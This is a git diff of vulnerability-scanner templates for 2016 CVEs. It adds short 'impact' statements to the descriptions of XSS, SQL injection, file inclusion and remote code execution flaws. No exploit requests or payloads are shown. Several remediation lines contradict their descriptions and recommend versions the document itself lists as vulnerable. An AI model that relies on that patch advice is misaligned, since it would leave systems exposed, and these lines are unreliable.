0f1d757108..18a07d5fc9 100644 --- a/http/cves/2016/CVE-2016-1000127.yaml +++ b/http/cves/2016/CVE-2016-1000127.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress AJAX Random Post 2.00 is vulnerable to reflected cross-site scripting. + impact: | + This vulnerability allows an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the WordPress AJAX Random Post plugin (2.00 or higher) to fix this issue. reference: diff --git a/http/cves/2016/CVE-2016-1000129.yaml b/http/cves/2016/CVE-2016-1000129.yaml index b6aae8a6bd..79ca19c4fd 100644 --- a/http/cves/2016/CVE-2016-1000129.yaml +++ b/http/cves/2016/CVE-2016-1000129.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress defa-online-image-protector 3.3 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the WordPress defa-online-image-protector plugin (version 3.3 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-1000130.yaml b/http/cves/2016/CVE-2016-1000130.yaml index 1cd7eca464..c2b5be93c0 100644 --- a/http/cves/2016/CVE-2016-1000130.yaml +++ b/http/cves/2016/CVE-2016-1000130.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Wordpress plugin e-search 1.0 and before contains a cross-site scripting vulnerability via date_select.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions. remediation: | Update to the latest version of the WordPress e-search plugin to mitigate this vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-1000131.yaml b/http/cves/2016/CVE-2016-1000131.yaml index b55f7cb4a0..fffebe547d 100644 --- a/http/cves/2016/CVE-2016-1000131.yaml +++ b/http/cves/2016/CVE-2016-1000131.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress e-search 1.0 and before contains a reflected cross-site scripting vulnerability via title_az.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Update to the latest version of the WordPress e-search plugin to mitigate this vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-1000132.yaml b/http/cves/2016/CVE-2016-1000132.yaml index 4f0854fcf0..cfe1007520 100644 --- a/http/cves/2016/CVE-2016-1000132.yaml +++ b/http/cves/2016/CVE-2016-1000132.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress enhanced-tooltipglossary 3.2.8 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Update to the latest version of WordPress enhanced-tooltipglossary plugin (3.2.9 or higher) which includes a fix for this vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-1000133.yaml b/http/cves/2016/CVE-2016-1000133.yaml index 0d81f509f8..16b0370298 100644 --- a/http/cves/2016/CVE-2016-1000133.yaml +++ b/http/cves/2016/CVE-2016-1000133.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Wordpress plugin forget-about-shortcode-buttons 1.1.1 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Allows attackers to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions. remediation: | Update to the latest version of the WordPress forget-about-shortcode-buttons plugin (1.1.1) or apply the necessary patches. reference: diff --git a/http/cves/2016/CVE-2016-1000134.yaml b/http/cves/2016/CVE-2016-1000134.yaml index 223cfb5ecb..c29a917f7a 100644 --- a/http/cves/2016/CVE-2016-1000134.yaml +++ b/http/cves/2016/CVE-2016-1000134.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress HDW Video Gallery 1.2 and before contains a cross-site scripting vulnerability via playlist.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions. remediation: | Update to the latest version of the WordPress HDW Video Gallery plugin (>=1.3) which includes a fix for this vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-1000135.yaml b/http/cves/2016/CVE-2016-1000135.yaml index 794f281be7..383447e359 100644 --- a/http/cves/2016/CVE-2016-1000135.yaml +++ b/http/cves/2016/CVE-2016-1000135.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress HDW Video Gallery 1.2 and before contains a cross-site scripting vulnerability via mychannel.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the WordPress HDW Video Gallery plugin (>=1.3) which includes a fix for this vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-1000137.yaml b/http/cves/2016/CVE-2016-1000137.yaml index 2052c3967a..5559223fb9 100644 --- a/http/cves/2016/CVE-2016-1000137.yaml 
+++ b/http/cves/2016/CVE-2016-1000137.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress Hero Maps Pro 2.1.0 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of WordPress Hero Maps Pro plugin (2.1.1 or higher) which includes a fix for this vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-1000138.yaml b/http/cves/2016/CVE-2016-1000138.yaml index 1bfabfd267..36f38b0bdd 100644 --- a/http/cves/2016/CVE-2016-1000138.yaml +++ b/http/cves/2016/CVE-2016-1000138.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress Admin Font Editor plugin indexisto 1.8 and before contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + This vulnerability allows an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the WordPress Admin Font Editor plugin (1.8 or higher) to fix this vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-1000139.yaml b/http/cves/2016/CVE-2016-1000139.yaml index 3dde7297ce..e7d8e6fa7e 100644 --- a/http/cves/2016/CVE-2016-1000139.yaml 
+++ b/http/cves/2016/CVE-2016-1000139.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress plugin Infusionsoft 1.5.11 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update to the latest version of the Infusionsoft Gravity Forms plugin (>=1.5.12) which includes a fix for this vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-1000140.yaml b/http/cves/2016/CVE-2016-1000140.yaml index dd66d576c2..0fb9490571 100644 --- a/http/cves/2016/CVE-2016-1000140.yaml +++ b/http/cves/2016/CVE-2016-1000140.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress New Year Firework 1.1.9 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could lead to cross-site scripting (XSS) attacks, allowing an attacker to execute malicious scripts on the victim's browser. remediation: | Update to the latest version of the WordPress New Year Firework plugin (1.1.9) to mitigate this vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-1000141.yaml b/http/cves/2016/CVE-2016-1000141.yaml index a402d0e709..d0e272fd13 100644 --- a/http/cves/2016/CVE-2016-1000141.yaml +++ b/http/cves/2016/CVE-2016-1000141.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress plugin Page-layout-builder v1.9.3 contains a cross-site scripting vulnerability. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Upgrade to version 2.0 or higher. reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=358 diff --git a/http/cves/2016/CVE-2016-1000142.yaml b/http/cves/2016/CVE-2016-1000142.yaml index 36eee6a756..019d0ba103 100644 --- a/http/cves/2016/CVE-2016-1000142.yaml +++ b/http/cves/2016/CVE-2016-1000142.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress MW Font Changer plugin 4.2.5 and before contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Allows remote attackers to execute arbitrary script or HTML code in the context of the affected site, potentially leading to session hijacking, defacement, or data theft. remediation: | Update to the latest version of the WordPress MW Font Changer plugin (4.2.5) or remove the plugin if it is not necessary. reference: diff --git a/http/cves/2016/CVE-2016-1000143.yaml b/http/cves/2016/CVE-2016-1000143.yaml index 9be75074a0..c24a934bb8 100644 --- a/http/cves/2016/CVE-2016-1000143.yaml +++ b/http/cves/2016/CVE-2016-1000143.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress Photoxhibit 2.1.8 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of WordPress Photoxhibit or apply the official patch provided by the vendor. reference: diff --git a/http/cves/2016/CVE-2016-1000146.yaml b/http/cves/2016/CVE-2016-1000146.yaml index fcc8cf7c31..5afc637255 100644 --- a/http/cves/2016/CVE-2016-1000146.yaml +++ b/http/cves/2016/CVE-2016-1000146.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress Pondol Form to Mail 1.1 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update to the latest version of the Pondol Form to Mail plugin (>=1.2) or apply a patch provided by the vendor to fix the XSS vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-1000148.yaml b/http/cves/2016/CVE-2016-1000148.yaml index 166a3e4193..008a2b354a 100644 --- a/http/cves/2016/CVE-2016-1000148.yaml +++ b/http/cves/2016/CVE-2016-1000148.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress S3 Video and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. remediation: | Update to the latest version of WordPress S3 Video plugin (>=0.984) to mitigate this vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-1000149.yaml b/http/cves/2016/CVE-2016-1000149.yaml index f7de15a6a0..04a4ce8de2 100644 --- a/http/cves/2016/CVE-2016-1000149.yaml +++ b/http/cves/2016/CVE-2016-1000149.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress plugin Simpel Reserveren 3.5.2 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions. remediation: | Upgrade to the latest version of the WordPress Simpel Reserveren plugin (>=3.5.3) or apply a patch provided by the vendor to fix the XSS vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-1000152.yaml b/http/cves/2016/CVE-2016-1000152.yaml index d08de79f4e..b1f638ce42 100644 --- a/http/cves/2016/CVE-2016-1000152.yaml +++ b/http/cves/2016/CVE-2016-1000152.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress tidio-form1.0 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, leading to potential data theft, session hijacking, or defacement. remediation: | Update to the latest version of the Tidio-form plugin (version >1.0) to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-1000153.yaml b/http/cves/2016/CVE-2016-1000153.yaml index 558c2437af..60172af726 100644 --- a/http/cves/2016/CVE-2016-1000153.yaml +++ b/http/cves/2016/CVE-2016-1000153.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress plugin tidio-gallery v1.1 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the WordPress Tidio Gallery plugin (1.1 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-1000154.yaml b/http/cves/2016/CVE-2016-1000154.yaml index 8b484e42f2..43d2b0f520 100644 --- a/http/cves/2016/CVE-2016-1000154.yaml +++ b/http/cves/2016/CVE-2016-1000154.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress plugin WHIZZ 1.07 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions. remediation: | Update WordPress WHIZZ plugin to the latest version (>=1.0.8) which includes a fix for the XSS vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-10033.yaml b/http/cves/2016/CVE-2016-10033.yaml index 29df698550..1eda1064b7 100644 --- a/http/cves/2016/CVE-2016-10033.yaml +++ b/http/cves/2016/CVE-2016-10033.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: critical description: WordPress PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a " (backslash double quote) in a crafted Sender property in isMail transport. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized remote code execution on the affected WordPress website. remediation: | Upgrade PHPMailer to version 5.2.18 or higher to mitigate this vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-10108.yaml b/http/cves/2016/CVE-2016-10108.yaml index 9ac460f158..928354d852 100644 --- a/http/cves/2016/CVE-2016-10108.yaml +++ b/http/cves/2016/CVE-2016-10108.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | Unauthenticated Remote Command injection as root occurs in the Western Digital MyCloud NAS 2.11.142 /web/google_analytics.php URL via a modified arg parameter in the POST data. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data loss, and potential compromise of the entire network. remediation: | Apply the latest firmware update provided by Western Digital to patch the vulnerability and ensure the device is not accessible from the internet. reference: diff --git a/http/cves/2016/CVE-2016-10134.yaml b/http/cves/2016/CVE-2016-10134.yaml index d4d4761c4b..95a020de63 100644 --- a/http/cves/2016/CVE-2016-10134.yaml +++ b/http/cves/2016/CVE-2016-10134.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: critical description: Zabbix before 2.2.14 and 3.0 before 3.0.4 allows remote attackers to execute arbitrary SQL commands via the toggle_ids array parameter in latest.php and perform SQL injection attacks. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the Zabbix application and underlying systems. remediation: | Apply the latest security patches or upgrade to a patched version of Zabbix to mitigate the SQL Injection vulnerability (CVE-2016-10134). reference: diff --git a/http/cves/2016/CVE-2016-10367.yaml b/http/cves/2016/CVE-2016-10367.yaml index 9b56e7bf00..458df44bb7 100644 --- a/http/cves/2016/CVE-2016-10367.yaml +++ b/http/cves/2016/CVE-2016-10367.yaml 
@@ -5,6 +5,8 @@ info: author: 0x_akoko severity: high description: Opsview Monitor Pro prior to 5.1.0.162300841, prior to 5.0.2.27475, prior to 4.6.4.162391051, and 4.5.x without a certain 2016 security patch is vulnerable to unauthenticated local file inclusion and can be exploited by issuing a specially crafted HTTP GET request utilizing a simple bypass. + impact: | + An attacker can read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: | Upgrade to the latest version of Opsview Monitor Pro to fix the local file inclusion vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-10368.yaml b/http/cves/2016/CVE-2016-10368.yaml index 473f513275..3fe459b2a0 100644 --- a/http/cves/2016/CVE-2016-10368.yaml +++ b/http/cves/2016/CVE-2016-10368.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Opsview Monitor Pro before 5.1.0.162300841, before 5.0.2.27475, before 4.6.4.162391051, and 4.5.x without a certain 2016 security patch contains an open redirect vulnerability. An attacker can redirect users to arbitrary web sites and conduct phishing attacks via the back parameter to the login URI. + impact: | + An attacker can redirect users to malicious websites, leading to phishing attacks or the download of malware. remediation: | Apply the latest patch or upgrade to a version that is not affected by the vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-10924.yaml b/http/cves/2016/CVE-2016-10924.yaml index 9669b0566a..9942744e27 100644 --- a/http/cves/2016/CVE-2016-10924.yaml +++ b/http/cves/2016/CVE-2016-10924.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Wordpress Zedna eBook download prior to version 1.2 was affected by a filedownload.php local file inclusion vulnerability. + impact: | + An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to sensitive information disclosure or remote code execution. remediation: | Update to the latest version of the plugin to fix the vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-10940.yaml b/http/cves/2016/CVE-2016-10940.yaml index cc540d57f6..85d786b5df 100644 --- a/http/cves/2016/CVE-2016-10940.yaml +++ b/http/cves/2016/CVE-2016-10940.yaml @@ -5,6 +5,8 @@ info: author: cckuailong,daffainfo severity: high description: zm-gallery plugin 1.0 for WordPress is susceptible to SQL injection via the order parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Update to the latest version of the zm-gallery plugin or apply the patch provided by the vendor. reference: diff --git a/http/cves/2016/CVE-2016-10956.yaml b/http/cves/2016/CVE-2016-10956.yaml index 2f9c801804..d831d16b6f 100644 --- a/http/cves/2016/CVE-2016-10956.yaml +++ b/http/cves/2016/CVE-2016-10956.yaml @@ -5,6 +5,8 @@ info: author: daffainfo,0x240x23elu severity: high description: WordPress Mail Masta 1.0 is susceptible to local file inclusion in count_of_send.php and csvexport.php. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: | Update WordPress Mail Masta to the latest version or apply the vendor-supplied patch to fix the local file inclusion vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-10960.yaml b/http/cves/2016/CVE-2016-10960.yaml index 23b3234f48..e03709e27e 100644 
--- a/http/cves/2016/CVE-2016-10960.yaml +++ b/http/cves/2016/CVE-2016-10960.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: WordPress wsecure plugin before 2.4 is susceptible to remote code execution via shell metacharacters in the wsecure-config.php publish parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected WordPress site. remediation: | Update to the latest version of WordPress wSecure Lite plugin (2.4 or higher) to fix the vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-10973.yaml b/http/cves/2016/CVE-2016-10973.yaml index ac9d4beafa..45cca208f3 100644 --- a/http/cves/2016/CVE-2016-10973.yaml +++ b/http/cves/2016/CVE-2016-10973.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The Brafton plugin before 3.4.8 for WordPress has XSS via the wp-admin/admin.php?page=BraftonArticleLoader tab parameter to BraftonAdminPage.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to the latest version of the Brafton WordPress Plugin (version 3.4.9 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-10993.yaml b/http/cves/2016/CVE-2016-10993.yaml index 65a5c49c55..e624503f44 100644 --- a/http/cves/2016/CVE-2016-10993.yaml +++ b/http/cves/2016/CVE-2016-10993.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress ScoreMe theme through 2016-04-01 contains a reflected cross-site scripting vulnerability via the s parameter which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patch or update to the ScoreMe Theme to fix the XSS vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-1555.yaml b/http/cves/2016/CVE-2016-1555.yaml index 93233c93dc..00df20bcbb 100644 --- a/http/cves/2016/CVE-2016-1555.yaml +++ b/http/cves/2016/CVE-2016-1555.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: NETGEAR WNAP320 Access Point Firmware version 2.0.3 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected device. remediation: | Apply the latest firmware update provided by NETGEAR to mitigate this vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-2389.yaml b/http/cves/2016/CVE-2016-2389.yaml index b447395a95..6395005405 100644 --- a/http/cves/2016/CVE-2016-2389.yaml +++ b/http/cves/2016/CVE-2016-2389.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: SAP xMII 15.0 for SAP NetWeaver 7.4 is susceptible to a local file inclusion vulnerability in the GetFileList function. This can allow remote attackers to read arbitrary files via a .. (dot dot) in the path parameter to /Catalog, aka SAP Security Note 2230978. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage. remediation: | Apply the latest security patches and updates provided by SAP to mitigate the vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-3081.yaml b/http/cves/2016/CVE-2016-3081.yaml index 48a352841f..d4c3dd6173 100644 --- a/http/cves/2016/CVE-2016-3081.yaml +++ b/http/cves/2016/CVE-2016-3081.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Apache Struts 2.3.19 to 2.3.20.2, 2.3.21 to 2.3.24.1, and 2.3.25 to 2.3.28, when dynamic method invocation is enabled, allows remote attackers to execute arbitrary code via method: prefix (related to chained expressions). + impact: | + Remote code execution remediation: | Upgrade to Apache Struts version 2.3.20.2, 2.3.24.2, or 2.3.28.1. reference: diff --git a/http/cves/2016/CVE-2016-3088.yaml b/http/cves/2016/CVE-2016-3088.yaml index 9aaa203602..858b3addfe 100644 --- a/http/cves/2016/CVE-2016-3088.yaml +++ b/http/cves/2016/CVE-2016-3088.yaml @@ -5,6 +5,8 @@ info: author: fq_hsu severity: critical description: Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request via the Fileserver web application. + impact: | + An attacker can write arbitrary files on the server, potentially leading to remote code execution. remediation: | Upgrade to Apache ActiveMQ version 5.14.0 or later to fix the vulnerability. reference: 
diff --git a/http/cves/2016/CVE-2016-3978.yaml b/http/cves/2016/CVE-2016-3978.yaml index d37aacfb59..956ef7d9fb 100644 --- a/http/cves/2016/CVE-2016-3978.yaml +++ b/http/cves/2016/CVE-2016-3978.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: FortiOS Web User Interface in 5.0.x before 5.0.13, 5.2.x before 5.2.3, and 5.4.x before 5.4.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks or cross-site scripting attacks via the "redirect" parameter to "login." + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, phishing attacks, and potential data theft. remediation: | Apply the latest security patches and updates provided by Fortinet to mitigate the vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-4437.yaml b/http/cves/2016/CVE-2016-4437.yaml index 20f11e6cb2..6f9a26c50c 100644 --- a/http/cves/2016/CVE-2016-4437.yaml +++ b/http/cves/2016/CVE-2016-4437.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Apache Shiro before 1.2.5, when a cipher key has not been configured for the "remember me" feature, allows remote attackers to execute arbitrary code or bypass intended access restrictions via an unspecified request parameter. + impact: | + Remote code execution remediation: | Upgrade to a patched version of Apache Shiro reference: diff --git a/http/cves/2016/CVE-2016-4975.yaml b/http/cves/2016/CVE-2016-4975.yaml index baacf4214d..3932795e1f 100644 --- a/http/cves/2016/CVE-2016-4975.yaml +++ b/http/cves/2016/CVE-2016-4975.yaml 
@@ -5,6 +5,8 @@ info: author: melbadry9,nadino,xElkomy severity: medium description: Apache CRLF injection allowing HTTP response splitting attacks on sites using mod_userdir. + impact: | + Successful exploitation of this vulnerability can lead to various attacks such as session hijacking, cross-site scripting (XSS), and cache poisoning. remediation: Upgrade to Apache HTTP Server 2.2.32/2.4.25 or higher. reference: - https://httpd.apache.org/security/vulnerabilities_22.html#CVE-2016-4975 diff --git a/http/cves/2016/CVE-2016-4977.yaml b/http/cves/2016/CVE-2016-4977.yaml index cd4ac35ff8..1cf46ca5e4 100644 --- a/http/cves/2016/CVE-2016-4977.yaml +++ b/http/cves/2016/CVE-2016-4977.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: high description: Spring Security OAuth versions 2.0.0 to 2.0.9 and 1.0.0 to 1.0.5 contain a remote command execution vulnerability. When processing authorization requests using the whitelabel views, the response_type parameter value was executed as Spring SpEL which enabled a malicious user to trigger remote command execution via the crafting of the value for response_type. + impact: | + Successful exploitation of this vulnerability can lead to remote code execution, compromising the affected system. remediation: Users of 1.0.x should not use whitelabel views for approval and error pages. Users of 2.0.x should either not use whitelabel views for approval and error pages or upgrade to 2.0.10 or later. reference: - https://github.com/vulhub/vulhub/blob/master/spring/CVE-2016-4977/README.md diff --git a/http/cves/2016/CVE-2016-5649.yaml b/http/cves/2016/CVE-2016-5649.yaml index c690d1423a..b9ac0410e6 100644 --- a/http/cves/2016/CVE-2016-5649.yaml +++ b/http/cves/2016/CVE-2016-5649.yaml 
@@ -5,6 +5,8 @@ info: author: suman_kar severity: critical description: NETGEAR DGN2200 / DGND3700 is susceptible to a vulnerability within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. The attacker can then use this password to gain administrator access of the targeted router's web interface. + impact: | + An attacker can obtain the admin password and gain unauthorized access to the router's settings, potentially leading to further compromise of the network. remediation: | Update the router firmware to the latest version, which includes a fix for the vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-6195.yaml b/http/cves/2016/CVE-2016-6195.yaml index 8f1834dda9..dc70d3f9f4 100644 --- a/http/cves/2016/CVE-2016-6195.yaml +++ b/http/cves/2016/CVE-2016-6195.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | vBulletin versions 3.6.0 through 4.2.3 are vulnerable to an SQL injection vulnerability in the vBulletin core forumrunner addon. The vulnerability allows an attacker to execute arbitrary SQL queries and potentially access sensitive information from the database. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system. remediation: | Upgrade to a patched version of vBulletin (4.2.4 or later) or apply the official patch provided by the vendor. reference: diff --git a/http/cves/2016/CVE-2016-6277.yaml b/http/cves/2016/CVE-2016-6277.yaml index a826c76e35..8ff6be6804 100644 --- a/http/cves/2016/CVE-2016-6277.yaml +++ b/http/cves/2016/CVE-2016-6277.yaml 
